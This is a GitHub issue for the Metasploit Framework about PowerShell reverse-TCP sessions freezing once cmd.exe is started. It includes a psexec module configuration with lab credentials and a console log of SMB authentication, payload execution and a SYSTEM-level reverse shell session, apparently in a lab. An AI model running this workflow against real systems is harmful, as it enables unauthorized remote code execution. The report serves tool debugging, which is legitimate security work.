Powershell sessions become unresponsive after starting cmd.exe

[zeroSteiner]

Powershell sessions stop working if you start cmd.exe (or another process that provides it's own interactive shell, such as nslookup). I believe it has to do with the fact that the IO streams aren't closely tied and instead the Powershell payload is effectively just a REPL.

Steps to reproduce

• [ ] Start a session using the windows/x64/powershell_reverse_tcp payload
• [ ] See that you can run basic commands like whoami
• [ ] Start cmd.exe or nslookup and see that the session stops working

msf6 exploit(windows/smb/psexec) > show options 

Module options (exploit/windows/smb/psexec):

   Name                  Current Setting  Required  Description
   ----                  ---------------  --------  -----------
   RHOSTS                192.168.159.10   yes       The target host(s), see https://github.com/rapid7/metasploit-framework/wiki/Using-Metasploit
   RPORT                 445              yes       The SMB service port (TCP)
   SERVICE_DESCRIPTION                    no        Service description to to be used on target for pretty listing
   SERVICE_DISPLAY_NAME                   no        The service display name
   SERVICE_NAME                           no        The service name
   SMBDomain             .                no        The Windows domain to use for authentication
   SMBPass               Password1!       no        The password for the specified username
   SMBSHARE                               no        The share to connect to, can be an admin share (ADMIN$,C$,...) or a normal read/write folder share
   SMBUser               smcintyre        no        The username to authenticate as

Payload options (windows/x64/powershell_reverse_tcp):

   Name          Current Setting  Required  Description
   ----          ---------------  --------  -----------
   EXITFUNC      thread           yes       Exit technique (Accepted: '', seh, thread, process, none)
   LHOST         192.168.159.128  yes       The listen address (an interface may be specified)
   LOAD_MODULES                   no        A list of powershell modules separated by a comma to download over the web
   LPORT         4444             yes       The listen port

Exploit target:

   Id  Name
   --  ----
   0   Automatic

View the full module info with the info, or info -d command.

msf6 exploit(windows/smb/psexec) > run

[*] Started reverse TCP handler on 192.168.159.128:4444 
[*] 192.168.159.10:445 - Connecting to the server...
[*] 192.168.159.10:445 - Authenticating to 192.168.159.10:445 as user 'smcintyre'...
[*] 192.168.159.10:445 - Selecting PowerShell target
[*] 192.168.159.10:445 - Executing the payload...
[+] 192.168.159.10:445 - Service start timed out, OK if running a command or non-service executable...
[*] Powershell session session 2 opened (192.168.159.128:4444 -> 192.168.159.10:64151) at 2023-05-16 14:16:49 -0400

PS C:\Windows\system32> pwd

Path               
----               
C:\Windows\system32

PS C:\Windows\system32> whoami  
nt authority\system
PS C:\Windows\system32> cmd.exe
ipconfig
whoami
^C
Abort session 2? [y/N]  y

[*] 192.168.159.10 - Powershell session session 2 closed.  Reason: User exit
msf6 exploit(windows/smb/psexec) >

[github-actions[bot]]

Hi!

This issue has been left open with no activity for a while now.

We get a lot of issues, so we currently close issues after 60 days of inactivity. It’s been at least 30 days since the last update here. If we missed this issue or if you want to keep it open, please reply here. You can also add the label "not stale" to keep this issue open!

As a friendly reminder: the best way to see this issue, or any other, fixed is to open a Pull Request.